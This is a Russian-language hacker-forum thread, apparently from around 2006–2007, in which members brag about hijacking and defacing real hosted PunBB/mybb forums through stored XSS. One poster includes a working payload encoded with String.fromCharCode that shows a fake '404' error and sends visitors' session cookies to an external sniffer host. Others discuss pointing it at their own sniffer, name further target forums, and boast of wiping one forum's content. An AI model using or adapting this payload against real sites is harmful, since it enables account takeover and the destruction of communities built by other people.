Знакомимся :) бб...
http://night.5bb.ru/, дифейсик через обычную xss (отправил сегодня в раздел видео, буду надеятся, что добавят :))
таким же макаром можно задифейсить любой из сети форумов - mybb.ru, 1bb 2bb и тд...
жду комментов :)

Где ж тут дефейс. Просто написание матершины, и всё:) А так молодец. Если правда конечно же. Ибо это можно и самому такой форум сделать, и всё в настройках прописать.

[sL1p]:
Всмысле правда? Ну так попакостили с напарником им немного, рассылку сделали, причем пришел ответ от одного обиженного - Гениально,аж до офигевания,вам череп не жмет? - kuroj@bk.ru. именно сейчас делаю мощную зачистку - форум тает на глазах :) 270 юзеров в бешенстве :) нефиг вампирами быть :)

Выложи код xss, через которую ты это всё взломал.

вот и она...
[/url]] (XSS@XSS[url=style=background:url(javascript:document.write (String.fromCharCode(1054,1096,1080,1073,1082,1072 ,32,52,48,52,60,115,99,114,105,112,116,62,105,109, 103,32,61,32,110,101,119,32,73,109,97,103,101,40,4 1,59,32,105,109,103,46,115,114,99,32,61,32,34,104, 116,116,112,58,47,47,99,111,109,112,45,105,110,102 ,111,46,114,117,47,112,105,99,47,105,109,97,103,10 1,46,106,112,103,63,34,43,100,111,99,117,109,101,1 10,116,46,99,111,111,107,105,101,59,60,47,115,99,1 14,105,112,116,62,32)));display:none;)

а деф голимый.. мягко говоря..

http://rap.5bb.ru/viewtopic.php?pid=596#p596
у меня не прокатила(

Digimortal:
лично мне было неохото особо то возиться с ними :) зато сайт свой порекламил немного :)
IOBOWAN:
lol :) ты не догадался исправить путь к сниферу на свой? :) грубо говоря ты сделал 20% работы и думал, что пассы сами к тебе свалются :)

Хм. я это тоже не понял... допустим картинка у меня на http://antichat.org/s/serversmchat.gif то какой должен быть код. напишите кто знает.

держите видео, может кому пригодится, незнаю когда на а.чате в видео опубликуют, если вообще опубликуют...
http://flood3r.com/files/mybb.rar (2,5 Mb)

!achtung
друзья, не пакостите сильно, а то через 2 дня ничего работать не будет(
после захвата форума, удалите созданные вами "злые" темы, дабы не палить
xss глупым админам сервиса.

блин ктонибуть может перевправить код под стандартный сниффер?

читайте статьи на а.чате, там это точно было. это обычный декод (аля - 2 это 1+1) :)

Ну не весь mybb. Часть майбб на инвижине - например 0bb.ru

а другая часть на жувачке? :D
ну насколько я знаю, майбб это в расшифровке - мой буллетин боард, если так, то все форумы, независимо, от 0bb или 1bb (RUHELP Goodboard Webtalk MyBB 0bb 1bb 3bb 4bb 5bb это все клоны), это одни и теже яйца. (модефикации булки короче, как я понял)

молодец канешна
плюс однозначно заслужил
но никто не подскажет где расшифровать эти цифры что в коде
помню у меня ссылка буржуйская была тама статья про хсс
там был калькулятор
но после формат с ничо неосталось
мож кто подкинет сылочку

Geniy:
sorry, может ты и прав, что не одни это теже движки... незнаю...

0bb,1bb,2bb - IPB
3bb,4bb,5bb - PUN

Фича работает ток на движке пун..

а mybb это ведь пан?
p/s - http://glebclub.4bb.ru/viewtopic.php?pid=16104#p16104 ждем пассов :)

Сам mybb.ru - да PUN

а на webtalk проканает сабж?

пока прокатывает, но уже заделали суки немного, теперь чтобы сменить ретривное мыло нужен пасс, которого, понятно дело, нету. вот такая шляпа. так, что единственная тема, это счастливый угон кук именно админа... жалко блин ):

а на webtalk проканает сабж?
Хм.. Вкбталк это пхпбб Вроде.. Врядли..

один я чтоли их сейчас чищу? :) у меня уже 6 за сегодня :)

проверил
на вебтолке не катит
а жаль

самое интересное, что в некоторых профилях юзеров возможно изменить мыло а в некоторых лишь с паролем, причем все это на одном и томже форуме, что за колдовство...

Походу, вроде прикрыли
В наших форумах была найдена уязвимость, позволяющаю вставить javascript в сообщение и получить куки пользователя.
По приблизительным данным злоумышленником было испорчено около 5-6 форумов (включая этот).

В данный момент такой уязвимости уже нет.

Кроме того, сделана авторизация с проверкой ip адреса.
Поэтому даже получив куки, злоумышленник ничего сделать не сможет.
При смене ip адреса Вам нужно будет повторно авторизоваться.

Могу с уверенностью сказать, что с новой системой авториации взломать форум просто невозможно.

что с новой системой авториации взломать форум просто невозможно.
Лольно:) Надо будет на досуге скули там поискать. Кстати эти лолеги на форуме бб шухер подняли ужасный, уже собирали антихакерскую коалицию, и хотели идти ломать ачат:)

просто один умник (мой напарник :)) решил похачить форум тех. поддержки, и как видете, реально помогло залочить эту xss, а жаль.
ps/ пиздежь, лично я 22 форума угнал, + постал дюк при мне 1, напарник штук 6, так что цифра - 6, официально заявленная, это, попросту говоря, бред.

сколько всего форумов бб хакнули? :)

http://forum.mybb.ru/viewtopic.php?id=12 песдец каламбур ::)

http://forum.mybb.ru/viewtopic.php?id=12 песдец каламбур ::)

(с) античат нафиг не пашет, не лазте туда там вирусов тофига!!!
гы =)

Так чем путь к снифферу зашифрован ?

Я хз чем зашифрован, похож на бинарную зашифровку, но не то всё равно.
Его можно было хоть чем зашифровать. Хоть тот же base64 или Hex url. Всё равно бы форум выполнил весь скрипт, и отослал куки на сниффер.
ЗЫ Столько гостей в этой теме, столько народу с бб нас читают:) Лолегам привет:)

']Я хз чем зашифрован, похож на бинарную зашифровку, но не то всё равно.
=)))))
[sL1p], это ж просто Ascii-кодировка...

Интеренсо почитать ))) http://forum.mybb.ru/viewtopic.php?id=12&p=29

У них за 2 дня 29 страниц дебатов)

я в шоке. 29 страниц накатали.
я под столом. боятся зайти на ф.ком и на ачат думая что на них нападут кусучие вирусы. не умея пользоваться фаерволом и антивирусом хотят напакостить.
Ness написал:
тык на http://flood3r.com/ кто нить был?
я... обычный сайт, много софта хакерного. возможно с вирусами
/у них все с вирусами, даже пирожки от бабушки кати :) на ф.ком нету ни байта хакерского софта да и тем более с вирусами.
Грин, зачем тебе файер? Раз ты каспером не пользуешься... можно идти и без файера. Через проксю.
куда они идти то собрались??? на этот форум?! таких тупиц надо поискать.
а и я всем советую компы проверить спомощью cureit я проверил до такого как на взломаный мабб в 12 00 гдето я зашёл на майбб потом ищё раз проверился было 12 троянов щас ищё проверяюсь
это вообще мистика, меньше водки пить надо.
ТаББаК - я труб, 452вируса..помните меня...
это пёрл уходящего 2006 года :)
Рукия Кучики - Люди, помогите!!!
Мне в ICQ Стучится некий G O O F Y!!!! Что делать? Я откланила, но все равно не по себе...Откуда он вообще мою Аську узнал?
нахуя мне комуто стучать, ржу.
Usher - Gekkon написал:
Или хотя б заберем... http://antichat.ru/ICQ/
смотри потом по шапке не получи
умницы :)
Usher - вот они, наши враги http://flood3r.com/articles/1/
базара ноль, это и моги враги :)

потом они узнали страшную мою тайну :)
http://erochat.ru/ui.html?qn=-----GOOFY..s..&mn=INDEX_FORM&w=v
это типо я :)

/итоги
юзеры дико стали беситься и обязательно скопипастят половину этого топика и будут его обсуждать лет 10. они уже создали антихакерскую коалицию, так что всем готовиться :)

(с) античат нафиг не пашет, не лазте туда там вирусов тофига!!!
гы =)

Так чем путь к снифферу зашифрован ?

Ну действительно, не руками же вы сидите кодируете....

_http://ha.ckers.org/xss.html

http://ha.ckers.org/xss.html
как вариант :)

ксати, сорри, я взял всего лишь кусочек кода и написал, что аски.. конечно, это уникод..
это всего лишь т.н. десятичное представление символов..

Digimortal:
ты это о чем? :)

Digimortal:
ты это о чем? :)
да это я к своему пред. посту...
гы, [sL1p], я те отвечать собирался, а ты пост взял да удалил.. ;-(

я просто рыдаю)))
стадо мешков хотят взломать античат))))))
это просто хит))
зафлудить ага)))

programmersexchange.3bb.ru
no comments...

ворошиловский стрелок прям :)
думаете хотябы один стукнул?)

жаль что уже профиксили....

Мля я все 40 страниц прочитал поржал в доволь :)

афтар канеш красива стащил куки, но нах было чистить саппорт форум? люди же все таки старались, или есть причины? сделал бы дефейс маленький и все...

и че та ты Гуффи раскричался тут, нахвастался гыгы будь спокоен.

ЗЫ: кстати эта уязвимость все еще существует на всех форумах панбб, вплоть до новых версии))

и еще мировой вопрос, как быть с форумом еси туда админ не заходит (в отьезде)
форум тож панбб па адресу _http://forum.fcmx.net/ па возможности нуна слить ат туда что то)))

Scripts:
лично я ничего не чистил.
и че та ты Гуффи раскричался тут, нахвастался гыгы будь спокоен.
это вообще добило, ты глаза протри да почитай внимательнее топик.
ЗЫ: кстати эта уязвимость все еще существует на всех форумах панбб, вплоть до новых версии)
америку не открыл.
и еще мировой вопрос, как быть с форумом еси туда админ не заходит (в отьезде)
сплясать в присядку.

патище чувак и не хами, я вопросы задал всем, или это тема твоя собственность?

ну а кто чистил? ты вроде взломал! или ты просто лицо взлома? хаха кто то нашел багу а ты чтоб паказаца)))

Успакойся парень я тебе зла не желаю, просто обсуждаю тему
жду ответа на свой вопрос или помощи

я сказал что не я. хули тебе еще надо. в помощь тебе - antichat.ru/articles/ и ya.ru-->iam cool lamer on line-->bb-->

да уж, спустись на землю флудер комовец, это всего лишь xss (в простонародии стащил куки)

Я ОБ ЭТОМ И РЕЧЬ ВИДУ ИДИОТИНА.
в простонародии ты не в теме, и пиздишь левую байку, мол я себя хвалю и записал в короли рунета. иди на*** недотёпа.

Успакойтесь :)

ты че нервничаешь? критические дни? мама тебе не рассказывала что нада делать? лол не ведись на слова яж сказал я не желаю тебе плохова просто сижу постью в теме)

античат нафиг не пашет, не лазте туда там вирусов тофига!!!
мда...там админы сидят, варюшку свою раскрыли :D
ты че нервничаешь? критические дни? мама тебе не рассказывала что нада делать? лол не ведись на слова яж сказал я не желаю тебе плохова просто сижу постью в теме)
иди на пикап форумы и там ругайся...Очень неприятно читать темы, где сплошной мат и наезды

я думаю что скрипт это засланец с майббшного форума
скорей всего админ который пытается выяснить кто поимел техподдержку
но могу ошибаться

я думаю что скрипт это засланец с майббшного форума
скорей всего админ который пытается выяснить кто поимел техподдержку
но могу ошибаться
я тоже так думаю, больно уж он хитренький.

я думаю что скрипт это засланец с майббшного форума
скорей всего админ который пытается выяснить кто поимел техподдержку
но могу ошибаться
Ошибаешься. Там уже всё улаженно.

спасиб канешн за чайника в репутации, долго ржал)))
а насчет засланца вы ашибаетесь, админ майбб не стал бы занимаца такой хернёй...

а я просто сказал гуффи что он много хвастаеца, как будто ломанул майкрософт ком)))

нивабиду никаму)

http://forum.mybb.ru :D АХАХАХАХАХА!!!!КТО ПОЧИСТИЛ САПОРТ ФОРУМ???

смотрите: http://persia.borda.ru/
даже тут обсуждают :)

Scripts:
скажи где в моих словах хоть доля хвастовства?
JIaMo:
да админ сам и почистил.
WEED:
да я чую, что у артемия на столе уже лежит доклад о крахе инета :)
[sL1p]:
расскажи чтоли че ты с админом то базарил? интересно ведь :) может помощь какую-то предлагал? :) рассказывай, не томи :)

смотрите: http://persia.borda.ru/
даже тут обсуждают :)

Да еще долго будут "говорить"! мне даже в чатах присают ! :p

Дамммс как вы все смотрели видео по взлому Найт?! О_о Там в самом начале видео Goofy уже админ,тоесть та Кама сама или как там её и панель Аминистрирования...и темка от Кама -сама создана!!Так нафиг были все эти понты с снифером? О_о
Goofy зачем тебе было ломать...если ты ...гмм...и так админом то был?=)

Урсула:
если до тебя недошло, то поясню, что я действительно на видео был админом, и от его ника показывал как я отобрал его куки. читай внимательно текстовое пояснение к видео (раз 50).

goofy
Аха знач ты всю эту тему начал еще раньше,а потом якобы снял от админши и что самое интересное форум целый...!Какая то неувязочка все равно!Мой знакомый один по сети просмотрел и это все отобразил на подставном форуме и сказал что это лажа!И все эти кода...их даже и близко нет!

без комментариев. я под столом.

ребята, как никрути баг был найден и взломан сервис майбб, наф ево терь апсуждать?

сегда так палучаеца, вот ломанешь патом думаешь "эх нада бы заснять на видео"

пачти се видео взломы на ачате паказывают взлом второй раз, па видео мона панять)

Scripts:
поговори вон с твоей женой - усулой, о жизне не легкой. может она тебя заодно русскому языку научит.

goofy
Аха знач ты всю эту тему начал еще раньше,а потом якобы снял от админши и что самое интересное форум целый...!Какая то неувязочка все равно!Мой знакомый один по сети просмотрел и это все отобразил на подставном форуме и сказал что это лажа!И все эти кода...их даже и близко нет!
отжег чувак :D
блин ну тырил он куки самого себя, запрещается чтоль?
а твой знакомый знач нуп ;)

гуфи не тебе меня учить, а урсула реальное гаварит, может это твой форум? ты зарегил ево.... ты дефеснул и заснял хахаха сижу пад сталом и выглядываю чтоб напечатать)))

отжег чувак :D
блин ну тырил он куки самого себя, запрещается чтоль?
а твой знакомый знач нуп ;)
Может быть...не спорю!Хотела сама так сказать убедится! :)

Scripts
Ну,что муж..?!! ;) ЛОЛ)))

Урсула, дабы нас паженили давай уж асю и фотки, знакомица пара))))

ЗЫ: ты м или ж?

Scripts
Не Гуф его зарегить не мог...потому что я знаю этот форум...хэх я раньше на нем рекламила,флудила и т.д и т.п=)

конечно я писал от разных ников 50 000 сообщений на том несчастном форуме, я это делал 3 месяца, потом сам себя хакнул зачем то :)
Урсула, Scripts - смотрите видео, смотрите на результат - более 40 форумов захваченно лишь одним мной, чтоже выходит я их сам нарегил (выберал цель из 1х сточек каталога, где от 30 000 мессаг)??? больше я с вами (Урсула, Scripts) говорить не о чем не буду. ya.ru вам в помощь :)

гуффи, выложи адреса форумов каторые ты как гаварица хакнул...

славо богу что у меня на форуме оказалось 29999 пастоф)))

Урсула, дабы нас паженили давай уж асю и фотки, знакомица пара))))

ЗЫ: ты м или ж?
Конечно ж!!Мне че делать нефиг под парня регится=)
Ну над фотой подумаю....а асю могу 269-474-763 :D

Scripts:
на снифере посмотри адреса. более точный сказать не могу ибо кэш в браузере чиститься автоматически, а записывать их куда либо нету смысла. самый значительный угон - форум крутого пети, лидера на бб по размеру форума.

конечно я писал от разных ников 50 000 сообщений на том несчастном форуме, я это делал 3 месяца, потом сам себя хакнул зачем то :)
Урсула, Scripts - смотрите видео, смотрите на результат - более 40 форумов захваченно лишь одним мной, чтоже выходит я их сам нарегил (выберал цель из 1х сточек каталога, где от 30 000 мессаг)??? больше я с вами (Урсула, Scripts) говорить не о чем не буду. ya.ru вам в помощь :)
Боже бедняга...это сколько тем создавал САМ...мне тя жалко!! Слушай Scripts Гууфу нужно отдать должное...как никак парень старался,а мы этакие сволочи наехали))) :D :D :D

Ёпт модеры убейте тему.. Здесь уже флуд пошёл как на самом майбб. Следующим писателям буду минусы ставить:)

фак, эта урсула из вышестоящих инстанции)

реально закройте тему, больше в ней обсуждать нечего, ибо xss заделана уже.

слип пасиб за минус, терь я супер ламер)